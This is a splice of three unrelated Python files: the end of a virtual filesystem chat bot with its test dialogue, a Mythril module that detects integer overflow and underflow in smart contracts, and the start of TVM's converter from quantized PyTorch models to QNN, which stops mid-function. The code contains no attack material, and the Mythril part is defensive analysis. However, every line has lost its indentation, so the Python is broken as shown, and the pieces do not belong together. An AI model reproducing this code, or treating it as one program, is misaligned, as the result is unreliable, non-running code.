fs pwd: show current path
fs write: write text
fs read: read text
fs rm: remove a file
fs rmdir: remove a directory
```
Use commands like `fs help write` for more details on specific
commands.
'''
def test():
fs = fs_new()
user = 'test_user'
fs['user_paths'][user] = '/'
assert is_directory(fs, '/')
for cmd, expected_response in sample_conversation():
fs, msg = fs_command(fs, user, cmd)
if msg != expected_response:
raise AssertionError('''
cmd: %s
expected: %s
but got : %s
''' % (cmd, expected_response, msg))
def sample_conversation():
return [
('cd /', 'Current path: /'),
('cd /home', 'ERROR: invalid path'),
('cd .', 'ERROR: invalid path'),
('mkdir home', 'directory created'),
('cd home', 'Current path: /home/'),
('cd /home/', 'Current path: /home/'),
('mkdir stuff/', 'ERROR: stuff/ is not a valid name'),
('mkdir stuff', 'directory created'),
('write stuff/file1 something', 'file written'),
('read stuff/file1', 'something'),
('read /home/stuff/file1', 'something'),
('read home/stuff/file1', 'ERROR: file does not exist'),
('pwd ', '/home/'),
('pwd bla', 'ERROR: syntax: pwd'),
('ls bla foo', 'ERROR: syntax: ls <optional_path>'),
('cd /', 'Current path: /'),
('rm home', 'ERROR: /home/ is a directory, file required'),
('rmdir home', 'removed'),
('ls ', 'WARNING: directory is empty'),
('cd home', 'ERROR: invalid path'),
('read /home/stuff/file1', 'ERROR: file does not exist'),
('cd /', 'Current path: /'),
('write /foo contents of /foo', 'file written'),
('read /foo', 'contents of /foo'),
('write /bar Contents: bar bar', 'file written'),
('read /bar', 'Contents: bar bar'),
('write /bar invalid', 'ERROR: file already exists'),
('rm /bar', 'removed'),
('rm /bar', 'ERROR: file does not exist'),
('write /bar new bar', 'file written'),
('read /bar', 'new bar'),
('write /yo/invalid whatever', 'ERROR: /yo is not a directory'),
('mkdir /yo', 'directory created'),
('read /yo', 'ERROR: /yo/ is a directory, file required'),
('ls /yo', 'WARNING: directory is empty'),
('read /yo/nada', 'ERROR: file does not exist'),
('write /yo whatever', 'ERROR: file already exists'),
('write /yo/apple red', 'file written'),
('read /yo/apple', 'red'),
('mkdir /yo/apple', 'ERROR: file already exists'),
('ls /invalid', 'ERROR: file does not exist'),
('ls /foo', 'ERROR: /foo is not a directory'),
('ls /', '* /*bar*\n* /*foo*\n* /yo/'),
('invalid command', 'ERROR: unrecognized command'),
('write', 'ERROR: syntax: write <path> <some_text>'),
('help', get_help()),
('help ls', 'syntax: ls <optional_path>'),
('help invalid_command', get_help()),
]
REGEXES = dict(
command='(cd|ls|mkdir|read|rmdir|rm|write|pwd)',
path='(\S+)',
optional_path='(\S*)',
some_text='(.+)',
)
def get_commands():
return {
'help': (fs_help, ['command']),
'ls': (fs_ls, ['optional_path']),
'mkdir': (fs_mkdir, ['path']),
'read': (fs_read, ['path']),
'rm': (fs_rm, ['path']),
'rmdir': (fs_rmdir, ['path']),
'write': (fs_write, ['path', 'some_text']),
'cd': (fs_cd, ['path']),
'pwd': (fs_pwd, []),
}
def fs_command(fs, user, cmd):
cmd = cmd.strip()
if cmd == 'help':
return fs, get_help()
cmd_name = cmd.split()[0]
cmd_args = cmd[len(cmd_name):].strip()
commands = get_commands()
if cmd_name not in commands:
return fs, 'ERROR: unrecognized command'
f, arg_names = commands[cmd_name]
partial_regexes = [REGEXES[a] for a in arg_names]
regex = ' '.join(partial_regexes)
regex += '$'
m = re.match(regex, cmd_args)
if m:
return f(fs, user, *m.groups())
elif cmd_name == 'help':
return fs, get_help()
else:
return fs, 'ERROR: ' + syntax_help(cmd_name)
def syntax_help(cmd_name):
commands = get_commands()
f, arg_names = commands[cmd_name]
arg_syntax = ' '.join('<' + a + '>' for a in arg_names)
if arg_syntax:
cmd = cmd_name + ' ' + arg_syntax
else:
cmd = cmd_name
return 'syntax: {}'.format(cmd)
def fs_new():
fs = {
'/': directory([]),
'user_paths': dict()
}
return fs
def fs_help(fs, user, cmd_name):
return fs, syntax_help(cmd_name)
def fs_mkdir(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path in fs:
return fs, 'ERROR: file already exists'
dir_path = os.path.dirname(path)
if not is_directory(fs, dir_path):
msg = 'ERROR: {} is not a directory'.format(dir_path)
return fs, msg
new_fs = fs.copy()
new_dir = directory({path}.union(fs[dir_path]['fns']))
new_fs[dir_path] = new_dir
new_fs[path] = directory([])
msg = 'directory created'
return new_fs, msg
def fs_ls(fs, user, fn):
if fn == '.' or fn == '':
path = fs['user_paths'][user]
else:
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if not is_directory(fs, path):
return fs, 'ERROR: {} is not a directory'.format(path)
fns = fs[path]['fns']
if not fns:
return fs, 'WARNING: directory is empty'
msg = '\n'.join('* ' + nice_path(fs, path) for path in sorted(fns))
return fs, msg
def fs_pwd(fs, user):
path = fs['user_paths'][user]
msg = nice_path(fs, path)
return fs, msg
def fs_rm(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if fs[path]['kind'] == 'dir':
msg = 'ERROR: {} is a directory, file required'.format(nice_path(fs, path))
return fs, msg
new_fs = fs.copy()
new_fs.pop(path)
directory = get_directory(path)
new_fs[directory]['fns'].remove(path)
msg = 'removed'
return new_fs, msg
def fs_rmdir(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: directory does not exist'
return fs, msg
if fs[path]['kind'] == 'text':
msg = 'ERROR: {} is a file, directory required'.format(nice_path(fs, path))
return fs, msg
new_fs = fs.copy()
new_fs.pop(path)
directory = get_directory(path)
new_fs[directory]['fns'].remove(path)
for sub_path in new_fs.keys():
if sub_path.startswith(path+'/'):
new_fs.pop(sub_path)
msg = 'removed'
return new_fs, msg
def fs_write(fs, user, fn, content):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path in fs:
msg = 'ERROR: file already exists'
return fs, msg
dir_path = os.path.dirname(path)
if not is_directory(fs, dir_path):
msg = 'ERROR: {} is not a directory'.format(dir_path)
return fs, msg
new_fs = fs.copy()
new_dir = directory({path}.union(fs[dir_path]['fns']))
new_fs[dir_path] = new_dir
new_fs[path] = text_file(content)
msg = 'file written'
return new_fs, msg
def fs_read(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if fs[path]['kind'] == 'dir':
msg = 'ERROR: {} is a directory, file required'.format(nice_path(fs, path))
return fs, msg
val = fs[path]['content']
return fs, val
def fs_cd(fs, user, fn):
if len(fn) > 1 and fn[-1] == '/':
fn = fn[:-1]
path = fn if len(fn) > 0 and fn[0] == '/' else make_path(fs, user, fn)[0]
if path not in fs:
msg = 'ERROR: invalid path'
return fs, msg
if fs[path]['kind'] == 'text':
msg = 'ERROR: {} is a file, directory required'.format(nice_path(fs, path))
return fs, msg
fs['user_paths'][user] = path
return fs, "Current path: {}".format(nice_path(fs, path))
def make_path(fs, user, leaf):
if leaf == '/':
return ['/', '']
if leaf.endswith('/'):
return ['', 'ERROR: {} is not a valid name'.format(leaf)]
if leaf.startswith('/'):
return [leaf, '']
path = fs['user_paths'][user]
if not path.endswith('/'):
path += '/'
path += leaf
return path, ''
def nice_path(fs, path):
path_nice = path
slash = path.rfind('/')
if path not in fs:
return 'ERROR: the current directory does not exist'
if fs[path]['kind'] == 'text':
path_nice = '{}*{}*'.format(path[:slash+1], path[slash+1:])
elif path != '/':
path_nice = '{}/'.format(path)
return path_nice
def get_directory(path):
slash = path.rfind('/')
if slash == 0:
return '/'
else:
return path[:slash]
def directory(fns):
return dict(kind='dir', fns=set(fns))
def text_file(content):
return dict(kind='text', content=content)
def is_directory(fs, fn):
if fn not in fs:
return False
return fs[fn]['kind'] == 'dir'
handler_class = VirtualFsHandler
if __name__ == '__main__':
# We eventually want to test bots with a "real" testing
# framework.
test()
|
|
"""This module contains the detection code for integer overflows and
underflows."""
from math import log2, ceil
from typing import cast, List, Dict, Set
from mythril.analysis import solver
from mythril.analysis.report import Issue
from mythril.analysis.swc_data import INTEGER_OVERFLOW_AND_UNDERFLOW
from mythril.exceptions import UnsatError
from mythril.laser.ethereum.state.global_state import GlobalState
from mythril.laser.ethereum.util import get_concrete_int
from mythril.laser.ethereum.state.annotation import StateAnnotation
from mythril.analysis.modules.base import DetectionModule
from copy import copy
from mythril.laser.smt import (
BVAddNoOverflow,
BVSubNoUnderflow,
BVMulNoOverflow,
BitVec,
symbol_factory,
Not,
Expression,
Bool,
And,
)
import logging
log = logging.getLogger(__name__)
class OverUnderflowAnnotation:
""" Symbol Annotation used if a BitVector can overflow"""
def __init__(
self, overflowing_state: GlobalState, operator: str, constraint: Bool
) -> None:
self.overflowing_state = overflowing_state
self.operator = operator
self.constraint = constraint
def __deepcopy__(self, memodict={}):
new_annotation = copy(self)
return new_annotation
class OverUnderflowStateAnnotation(StateAnnotation):
""" State Annotation used if an overflow is both possible and used in the annotated path"""
def __init__(self) -> None:
self.overflowing_state_annotations = set() # type: Set[OverUnderflowAnnotation]
def __copy__(self):
new_annotation = OverUnderflowStateAnnotation()
new_annotation.overflowing_state_annotations = copy(
self.overflowing_state_annotations
)
return new_annotation
class IntegerOverflowUnderflowModule(DetectionModule):
"""This module searches for integer over- and underflows."""
def __init__(self) -> None:
""""""
super().__init__(
name="Integer Overflow and Underflow",
swc_id=INTEGER_OVERFLOW_AND_UNDERFLOW,
description=(
"For every SUB instruction, check if there's a possible state "
"where op1 > op0. For every ADD, MUL instruction, check if "
"there's a possible state where op1 + op0 > 2^32 - 1"
),
entrypoint="callback",
pre_hooks=[
"ADD",
"MUL",
"EXP",
"SUB",
"SSTORE",
"JUMPI",
"STOP",
"RETURN",
"CALL",
],
)
"""
Cache satisfiability of overflow constraints
"""
self._ostates_satisfiable = set() # type: Set[GlobalState]
self._ostates_unsatisfiable = set() # type: Set[GlobalState]
def reset_module(self):
"""
Resets the module
:return:
"""
super().reset_module()
self._ostates_satisfiable = set()
self._ostates_unsatisfiable = set()
def _execute(self, state: GlobalState) -> None:
"""Executes analysis module for integer underflow and integer overflow.
:param state: Statespace to analyse
:return: Found issues
"""
address = _get_address_from_state(state)
if address in self.cache:
return
opcode = state.get_current_instruction()["opcode"]
funcs = {
"ADD": [self._handle_add],
"SUB": [self._handle_sub],
"MUL": [self._handle_mul],
"SSTORE": [self._handle_sstore],
"JUMPI": [self._handle_jumpi],
"CALL": [self._handle_call],
"RETURN": [self._handle_return, self._handle_transaction_end],
"STOP": [self._handle_transaction_end],
"EXP": [self._handle_exp],
}
for func in funcs[opcode]:
func(state)
def _get_args(self, state):
stack = state.mstate.stack
op0, op1 = (
self._make_bitvec_if_not(stack, -1),
self._make_bitvec_if_not(stack, -2),
)
return op0, op1
def _handle_add(self, state):
op0, op1 = self._get_args(state)
c = Not(BVAddNoOverflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "addition", c)
op0.annotate(annotation)
def _handle_mul(self, state):
op0, op1 = self._get_args(state)
c = Not(BVMulNoOverflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "multiplication", c)
op0.annotate(annotation)
def _handle_sub(self, state):
op0, op1 = self._get_args(state)
c = Not(BVSubNoUnderflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "subtraction", c)
op0.annotate(annotation)
def _handle_exp(self, state):
op0, op1 = self._get_args(state)
if op0.symbolic and op1.symbolic:
constraint = And(
op1 > symbol_factory.BitVecVal(256, 256),
op0 > symbol_factory.BitVecVal(1, 256),
)
elif op1.symbolic:
if op0.value < 2:
return
constraint = op1 >= symbol_factory.BitVecVal(
ceil(256 / log2(op0.value)), 256
)
elif op0.symbolic:
if op1.value == 0:
return
constraint = op0 >= symbol_factory.BitVecVal(
2 ** ceil(256 / op1.value), 256
)
else:
constraint = op0.value ** op1.value >= 2 ** 256
annotation = OverUnderflowAnnotation(state, "exponentiation", constraint)
op0.annotate(annotation)
@staticmethod
def _make_bitvec_if_not(stack, index):
value = stack[index]
if isinstance(value, BitVec):
return value
stack[index] = symbol_factory.BitVecVal(value, 256)
return stack[index]
@staticmethod
def _get_description_head(annotation, _type):
return "The binary {} can {}.".format(annotation.operator, _type.lower())
@staticmethod
def _get_description_tail(annotation, _type):
return (
"The operands of the {} operation are not sufficiently constrained. "
"The {} could therefore result in an integer {}. Prevent the {} by checking inputs "
"or ensure sure that the {} is caught by an assertion.".format(
annotation.operator,
annotation.operator,
_type.lower(),
_type.lower(),
_type.lower(),
)
)
@staticmethod
def _get_title(_type):
return "Integer {}".format(_type)
@staticmethod
def _handle_sstore(state: GlobalState) -> None:
stack = state.mstate.stack
value = stack[-2]
if not isinstance(value, Expression):
return
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_jumpi(state):
stack = state.mstate.stack
value = stack[-2]
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_call(state):
stack = state.mstate.stack
value = stack[-3]
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_return(state: GlobalState) -> None:
"""
Adds all the annotations into the state which correspond to the
locations in the memory returned by RETURN opcode.
:param state: The Global State
"""
stack = state.mstate.stack
offset, length = stack[-1], stack[-2]
state_annotation = _get_overflowunderflow_state_annotation(state)
for element in state.mstate.memory[offset : offset + length]:
if not isinstance(element, Expression):
continue
for annotation in element.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
def _handle_transaction_end(self, state: GlobalState) -> None:
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in state_annotation.overflowing_state_annotations:
ostate = annotation.overflowing_state
if ostate in self._ostates_unsatisfiable:
continue
if ostate not in self._ostates_satisfiable:
try:
constraints = ostate.mstate.constraints + [annotation.constraint]
solver.get_model(constraints)
self._ostates_satisfiable.add(ostate)
except:
self._ostates_unsatisfiable.add(ostate)
continue
log.debug(
"Checking overflow in {} at transaction end address {}, ostate address {}".format(
state.get_current_instruction()["opcode"],
state.get_current_instruction()["address"],
ostate.get_current_instruction()["address"],
)
)
try:
constraints = state.mstate.constraints + [annotation.constraint]
transaction_sequence = solver.get_transaction_sequence(
state, constraints
)
except UnsatError:
continue
_type = "Underflow" if annotation.operator == "subtraction" else "Overflow"
issue = Issue(
contract=ostate.environment.active_account.contract_name,
function_name=ostate.environment.active_function_name,
address=ostate.get_current_instruction()["address"],
swc_id=INTEGER_OVERFLOW_AND_UNDERFLOW,
bytecode=ostate.environment.code.bytecode,
title=self._get_title(_type),
severity="High",
description_head=self._get_description_head(annotation, _type),
description_tail=self._get_description_tail(annotation, _type),
gas_used=(state.mstate.min_gas_used, state.mstate.max_gas_used),
transaction_sequence=transaction_sequence,
)
address = _get_address_from_state(ostate)
self.cache.add(address)
self.issues.append(issue)
detector = IntegerOverflowUnderflowModule()
def _get_address_from_state(state):
return state.get_current_instruction()["address"]
def _get_overflowunderflow_state_annotation(
state: GlobalState
) -> OverUnderflowStateAnnotation:
state_annotations = cast(
List[OverUnderflowStateAnnotation],
list(state.get_annotations(OverUnderflowStateAnnotation)),
)
if len(state_annotations) == 0:
state_annotation = OverUnderflowStateAnnotation()
state.annotate(state_annotation)
return state_annotation
else:
return state_annotations[0]
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-outside-toplevel
""" Functions to convert quantized torch models to QNN """
import numpy as np
import tvm
from tvm import relay
from tvm.relay import expr as _expr
from tvm.relay import op as _op
from tvm.relay.frontend.common import infer_shape
from .common import logger
from .pytorch_utils import is_version_greater_than
class QNNParam:
"""A placeholder for weight quantization parameters"""
def __init__(self, weight, bias, scale, zero_point):
self.weight = weight
if bias is not None:
self.bias = bias.detach().numpy()
else:
self.bias = None
self.scale = _expr.const(scale)
self.zero_point = _expr.const(zero_point, dtype="int32")
class ConvPackedParam(QNNParam):
"""A placeholder for quantized conv2d op attributes
As of PyTorch 1.6, attributes of quantized conv2d ops, like
stride, padding etc are stored in ConvPackedParams objects,
together with weights and quantization parameters
"""
def __init__(
self,
weight_np,
bias,
scale,
zero_point,
stride,
padding,
dilation,
groups,
output_padding,
):
super().__init__(weight_np, bias, scale, zero_point)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
# Used only for conv_transpose2d
self.output_padding = output_padding
def _get_quant_params(qweight):
import torch
weight_np = qweight.dequantize().numpy()
if qweight.qscheme() == torch.per_tensor_affine:
return weight_np, qweight.q_scale(), int(qweight.q_zero_point())
scales = qweight.q_per_channel_scales().numpy()
zero_points = qweight.q_per_channel_zero_points().numpy()
# This is an assumption posed by QNN
msg = "The values of zero points should be all zero for per channel"
assert np.all(zero_points == 0), msg
return weight_np, scales, 0
def make_qnn_param(qweight, bias):
weight_np, scale, zero_point = _get_quant_params(qweight)
return QNNParam(weight_np, bias, scale, zero_point)
def make_conv_packed_param(qweight, bias, packed_params):
weight_np, scale, zero_point = _get_quant_params(qweight)
stride = packed_params.stride()
padding = packed_params.padding()
dilation = packed_params.dilation()
groups = packed_params.groups()
output_padding = packed_params.output_padding()
return ConvPackedParam(
weight_np,
bias,
scale,
zero_point,
stride,
padding,
dilation,
groups,
output_padding,
)
def get_weight_quant_params(script_module, packed_param_names):
"""Retrive and unpack weight parameters from quantized modules"""
import torch
param_name = "_packed_params"
quant_params = {}
def filter_func(named_module):
m = named_module[1]
return isinstance(m, torch.jit.RecursiveScriptModule) and (
("Conv" in m.original_name) or (m.original_name == "LinearPackedParams")
)
for name, m in filter(filter_func, script_module.named_modules()):
key = name + "." + param_name
state_dict = m.state_dict()
if key not in packed_param_names:
continue
if len(state_dict) == 0 and not hasattr(m, param_name):
# for v1.6 and above
# This case seems to happen if a model is serialized
# and loaded back
# This module can be safely ignored
continue
if len(state_dict) == 0 and hasattr(m, param_name):
# for v1.6 and above
packed_params = m._packed_params
else:
assert len(state_dict) == 1
packed_params = list(state_dict.values())[0]
if "Conv" in m.original_name and len(state_dict) == 0:
qweight, bias = torch.ops.quantized.conv2d_unpack(packed_params)
quant_params[key] = make_conv_packed_param(qweight, bias, packed_params)
elif "Conv" in m.original_name:
qweight, bias = torch.ops.quantized.conv2d_unpack(packed_params)
quant_params[key] = make_qnn_param(qweight, bias)
elif m.original_name == "LinearPackedParams":
qweight, bias = torch.ops.quantized.linear_unpack(packed_params)
quant_params[key] = make_qnn_param(qweight, bias)
return quant_params
def quantize_numpy(weight, scale, zero_point, out_dtype_np):
iinfo = np.iinfo(out_dtype_np)
clip_min = iinfo.min
clip_max = iinfo.max
if len(scale.shape) > 0:
scale = np.reshape(scale, [weight.shape[0]] + [1] * (len(weight.shape) - 1))
transformed = zero_point + weight / scale
return np.clip(np.round(transformed), clip_min, clip_max).astype(out_dtype_np)
def add_quant_params_to_outputs(
outputs, packed_param_map, quant_params, input_scales_for_bias, keep_quantized_weight=False
):
"""
Add quant params to outputs so that they can be referenced by other
ops later. Weights are quantized here.
"""
for node_name, packed_param_name in packed_param_map.items():
qparam = quant_params[packed_param_name]
weight_scale = _get_numpy(qparam.scale)
param_prefix = packed_param_name[: -len("._packed_params")]
if keep_quantized_weight:
qparam.weight_var = _expr.var(
param_prefix + "_weight", shape=qparam.weight.shape, dtype="int8"
)
qparam.weight = quantize_numpy(
qparam.weight, weight_scale, _get_numpy(qparam.zero_point), np.int8
)
qweight = qparam.weight_var
else:
qparam.weight_var = _expr.var(
param_prefix + "_weight", shape=qparam.weight.shape, dtype="float32"
)
qweight = relay.qnn.op.quantize(
qparam.weight_var, qparam.scale, qparam.zero_point, out_dtype="int8", axis=0
)
if qparam.bias is not None:
float_bias_var = _expr.var(
param_prefix + "_bias", shape=qparam.bias.shape, dtype="float32"
)
if node_name not in input_scales_for_bias:
# This case is for dynamic quantization, where the input activation scale is
# unknown until runtime.
qparam.bias_var = float_bias_var
qbias = qparam.bias_var
elif keep_quantized_weight:
qparam.bias_var = _expr.var(
param_prefix + "_bias", shape=qparam.bias.shape, dtype="int32"
)
qparam.bias = quantize_numpy(
qparam.bias, input_scales_for_bias[node_name] * weight_scale, 0, np.int32
)
qbias = qparam.bias_var
else:
qparam.bias_var = float_bias_var
qbias = relay.qnn.op.quantize(
qparam.bias_var,
_expr.const(input_scales_for_bias[node_name] * weight_scale),
_expr.const(0, "int32"),
out_dtype="int32",
axis=0,
)
else:
qbias = None
quant_params[packed_param_name] = qparam
params = [qweight, qparam.scale, qparam.zero_point, qbias]
if isinstance(quant_params[packed_param_name], ConvPackedParam):
params += [
qparam.stride,
qparam.padding,
qparam.dilation,
qparam.groups,
qparam.output_padding,
]
outputs[node_name] = params
def _get_quant_param_for_input(input_value):
"""
We want to know the input scale and zp of this input_value, since
input quant params are not explicitly passed around in torch (they
are embedded in a QTensor data structure, not visible statically).
We know that it is quantized using output scale and zp
of some previous quantized op. The purpose of this function
is to find that pair of parameters.
"""
# Indices for output scale and zp
# For example, in quantized::conv2d(%input, %1, %2, %3, %4, %5, %6, %7),
# 6th and 7th arg are output scale and zp respectively.
# PyTorch 1.6 changed qconv API
if is_version_greater_than("1.5.1"):
qconv_indices = (2, 3)
else:
qconv_indices = (6, 7)
output_quant_param_indices = {
"aten::quantize_per_tensor": (1, 2),
"quantized::conv2d": qconv_indices,
"quantized::conv2d_relu": qconv_indices,
"quantized::linear": (2, 3),
"quantized::linear_relu": (2, 3),
"quantized::add_relu": (2, 3),
"quantized::add": (2, 3),
"quantized::mul_relu": (2, 3),
"quantized::mul": (2, 3),
"quantized::cat": (2, 3),
"quantized::mul_scalar": (2, 3),
"quantized::add_scalar": (2, 3),
"quantized::hardswish": (1, 2),
"quantized::conv_transpose2d": qconv_indices,
}
def dfs(current_node):
# trace back to find the producer of this input value
current_op = current_node.kind()
if current_op in output_quant_param_indices:
indices = output_quant_param_indices[current_op]
scale = current_node.inputsAt(indices[0])
zp = current_node.inputsAt(indices[1])
return scale, zp
# Trace back eariler nodes, dfs order
# Assume quantized tensor comes earlier in the args
for arg in current_node.inputs():
return dfs(arg.node())
# shouldn't happen
assert False, "No producer for %s" % (str(current_node))
return dfs(input_value.node())
def _get_add_scalar_output_quant_param(input_scale, input_zero_point, scalar):
"""
Determine the output scale and zp of quantized::add_scalar op
This is used for mobilenet v3
Refer to aten/src/ATen/native/quantized/cpu/qadd.cpp
The names of variables are the same as torch impl
"""
q_min = 0
q_max = 255
s = input_scale
z = input_zero_point
c = scalar
c_q = round(c / s)
if q_min > z - c_q:
s_prime = (float(q_max) - (z - c_q)) / (float(q_max) - q_min) * s
z_prime = q_min
elif q_max < z - c_q:
s_prime = (float(z - c_q) - q_min) / (float(q_max) - q_min) * s
z_prime = q_max
else:
s_prime = s
z_prime = z - c_q
return s_prime, z_prime
def _get_mul_scalar_output_quant_param(input_scale, input_zero_point, scalar):
"""
Determine the output scale and zp of quantized::mul_scalar op
This is used for mobilenet v3
Refer to aten/src/ATen/native/quantized/cpu/qmul.cpp
The names of variables are the same as torch impl
"""
q_min = 0
q_max = 255
self_scale = input_scale
self_zero_point = input_zero_point
other_val = scalar
if other_val > 0.0:
s_prime = other_val * self_scale
z_prime = self_zero_point
elif other_val == 0.0:
s_prime = 1.0
z_prime = 0
else:
s_prime = abs(other_val) * self_scale
z_prime = q_max - (self_zero_point - q_min)
return s_prime, z_prime
def _add_output_quant_params_to_scalar_op(node, graph, input_scale, input_zero_point, scalar):
"""
The output scale and zp of {add,mul}_scalar op are not explicit in the IR
They are required for _get_quant_param_for_input above to work correctly
So calculate these params using the same way torch does, and make new
constant nodes in the input IR. Also add these params to the inputs of
scalar op.
For example,
%6 : float = prim::Constant[value=3.]()
%input : QUInt8(1, 3, 224, 224) = quantized::add_scalar(%x.1, %6)
becomes
%6 : float = prim::Constant[value=3.]()
%7 : float = prim::Constant[value=0.015686161816120148]()
%8 : int = prim::Constant[value=0]()
%input : UInt8(1, 3, 224, 224) = quantized::add_scalar(%x.1, %6, %7, %8)
%7 and %8 are newly created output scale and zp constant nodes
"""
# pylint: disable=c-extension-no-member
import torch
operator = node.kind()
if operator == "quantized::mul_scalar":
out_scale, out_zero_point = _get_mul_scalar_output_quant_param(
input_scale, input_zero_point, scalar
)
elif operator == "quantized::add_scalar":
out_scale, out_zero_point = _get_add_scalar_output_quant_param(
input_scale, input_zero_point, scalar
)
else:
raise NotImplementedError("unsupported scalar op: %s" % operator)
# create new constant nodes and add them to graph
out_scale_node = graph.create("prim::Constant")
out_zero_point_node = graph.create("prim::Constant")
out_scale_node.insertBefore(node)
out_zero_point_node.insertBefore(node)
out_scale_node.f_("value", out_scale)
out_zero_point_node.i_("value", out_zero_point)
out_scale_node.output().setType(torch._C.FloatType.get())
out_zero_point_node.output().setType(torch._C.IntType.get())
node.addInput(out_scale_node.output())
node.addInput(out_zero_point_node.output())
def add_input_quant_params_to_op_inputs(graph):
"""
In Torch, input quant params are not explicitly passed around
Instead, they are stored in QTensor data structure, and retrieved
at runtime by each quantized ops.
However, they need to be known statically for QNN translation.
To workaround and simplify the translation of inputs, we manually add
input quant params to inputs of Torch quantized operators listed below.
See _quantized_conv2d() below for example of why this is helpful.
For example,
%input : QUInt8(1, 512, 7, 7) = quantized::add(%x.8, %x.9, %434, %435)
becomes
%395 : float = prim::Constant[value=0.036212071776390076]()
%396 : int = prim::Constant[value=0]()
%430 : float = prim::Constant[value=0.16080744564533234]()
%431 : int = prim::Constant[value=42]()
%input : QUInt8(1, 512, 7, 7) = quantized::add(%x.8, %x.9, %434, %435,
%430, %431, %395, %396)
%434, %435 are output scale and zp of quantized::add op
%430, %431, %395, %396 are two pairs of input (scale, zp) for two tensors
added by this function
"""
# How many quantized tensors each op takes as inputs?
# A pair of (scale, zp) for each input quantized tensor will be added
# to the input nodes
num_quantized_inputs = {
"quantized::conv2d": 1,
"quantized::conv2d_relu": 1,
"quantized::linear": 1,
"quantized::linear_relu": 1,
"quantized::add_relu": 2,
"quantized::add": 2,
"quantized::mul_relu": 2,
"quantized::mul": 2,
"aten::dequantize": 1,
"aten::mean": 1,
"aten::upsample_nearest2d": 1,
"aten::upsample_bilinear2d": 1,
"aten::relu_": 1,
"aten::relu": 1,
"quantized::add_scalar": 1,
"quantized::mul_scalar": 1,
"quantized::relu6": 1,
"quantized::hardswish": 1,
"aten::hardsigmoid": 1,
"quantized::conv_transpose2d": 1,
}
need_input_quant_param = set(num_quantized_inputs.keys())
need_input_quant_param.add("quantized::cat")
input_scales_for_bias = {}
for node in graph.nodes():
operator = node.kind()
if operator not in need_input_quant_param:
continue
input_scales = []
input_zero_points = []
if operator == "quantized::cat":
# the number of inputs to concat is not constant
# so handle it separately
inputs = node.inputsAt(0).node().inputs()
for inp in inputs:
scale, zp = _get_quant_param_for_input(inp)
input_scales.append(scale)
input_zero_points.append(zp)
else:
for i in range(num_quantized_inputs[operator]):
scale, zp = _get_quant_param_for_input(node.inputsAt(i))
input_scales.append(scale)
input_zero_points.append(zp)
if operator in ["quantized::add_scalar", "quantized::mul_scalar"]:
scalar = node.inputsAt(1).node().f("value")
inp_scale = input_scales[0].node().f("value")
inp_zero_point = input_zero_points[0].node().i("value")
# see the comments in this function above
_add_output_quant_params_to_scalar_op(node, graph, inp_scale, inp_zero_point, scalar)
for scale, zp in zip(input_scales, input_zero_points):
node.addInput(scale)
node.addInput(zp)
if "conv" in operator or "linear" in operator:
# This is required for quantizing the bias
input_scales_for_bias[node.inputsAt(1).debugName()] = scale.node().f("value")
return input_scales_for_bias
def add_quant_params(params, quant_params):
"""Add quant parameters to TVM param map"""
for qparam in quant_params.values():
params[qparam.weight_var.name_hint] = tvm.nd.array(qparam.weight)
if qparam.bias is not None:
params[qparam.bias_var.name_hint] = tvm.nd.array(qparam.bias)
def apply_with_upcast(data, func):
inp = _op.cast(data, dtype="int32")
out = func(inp)
return _op.cast(out, "uint8")
def quantized_mean(data, input_scale, input_zero_point, func_fp32):
# refer to aten/src/ATen/native/quantized/cpu/qreduction.cpp
dequantized = relay.qnn.op.dequantize(data, input_scale, input_zero_point)
out = func_fp32(dequantized)
return relay.qnn.op.quantize(out, input_scale, input_zero_point, out_dtype="uint8", axis=1)
def quantized_upsample(data, input_scale, input_zero_point, func_fp32):
# currently piggy backs to fp32, it gets identical output as torch
data = relay.qnn.op.dequantize(data, input_scale, input_zero_point)
out = func_fp32(data)
return relay.qnn.op.quantize(out, input_scale, input_zero_point, out_dtype="uint8", axis=1)
def quantized_relu(data, input_zero_point):
# refer to aten/src/ATen/native/quantized/cpu/qrelu.cpp
zp = _op.cast(input_zero_point, dtype="uint8")
return _op.tensor.maximum(data, zp)
def _quantize_per_tensor():
def _impl(inputs, _):
return relay.qnn.op.quantize(
inputs[0], _expr.const(inputs[1]), _expr.const(inputs[2]), out_dtype="uint8", axis=1
)
return _impl
def _dequantize():
def _impl(inputs, _):
assert len(inputs) == 3, "Input quant params not found in op inputs"
inp_scale = _expr.const(inputs[1])
